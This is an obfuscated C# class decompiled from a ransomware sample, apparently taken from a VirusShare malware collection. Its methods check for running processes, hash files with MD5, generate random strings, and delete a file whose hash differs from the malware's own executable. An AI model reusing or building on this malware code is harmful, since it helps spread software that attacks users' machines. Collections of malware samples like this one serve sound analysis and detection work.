// Decompiled with JetBrains decompiler // Type: A.cee7cc3756d4f6d8913411c92b2e1cc36 // Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe using System; using System.Diagnostics; using System.IO; using System.Security.Cryptography; using System.Text; namespace A { internal class cee7cc3756d4f6d8913411c92b2e1cc36 { public bool c8aea4603f5edff1781d66fc7c389635e(string cf11b7aa1c9e7d8e2089a37fab75f7bc2) => Process.GetProcessesByName(cf11b7aa1c9e7d8e2089a37fab75f7bc2).Length > 0; private string c0b5e2bd54f7aaa36254ad6108123d704(string c32d06ec84131a62668e3e18e23c950ae) { FileStream inputStream = File.OpenRead(c32d06ec84131a62668e3e18e23c950ae); byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream); inputStream.Close(); return BitConverter.ToString(hash).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToUpper(); } public string c31239248ceba059cc32e70ac96898ec2(string c45a1644c18560d9d988c8c135941ea96) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(c45a1644c18560d9d988c8c135941ea96))).Replace(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(390), "").ToLower().ToUpper(); public string c4028bc68211f16a03921654b4b8b346f(int cc0d8efdc055b694066b5391dc96356b6) { Random random = new Random(); string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(393); string empty = string.Empty; for (int index = 0; index < cc0d8efdc055b694066b5391dc96356b6; ++index) empty += str.Substring(random.Next(0, str.Length), 1); return empty; } public bool c8f544c7c514248e2027acc2eed25b743(string c8ce60bab4df112e38d93bdc39407e331) { if (!File.Exists(c8ce60bab4df112e38d93bdc39407e331)) return false; if (!(this.c0b5e2bd54f7aaa36254ad6108123d704(c8ce60bab4df112e38d93bdc39407e331) != this.c0b5e2bd54f7aaa36254ad6108123d704(Process.GetCurrentProcess().MainModule.FileName))) return true; File.Delete(c8ce60bab4df112e38d93bdc39407e331); return false; } } }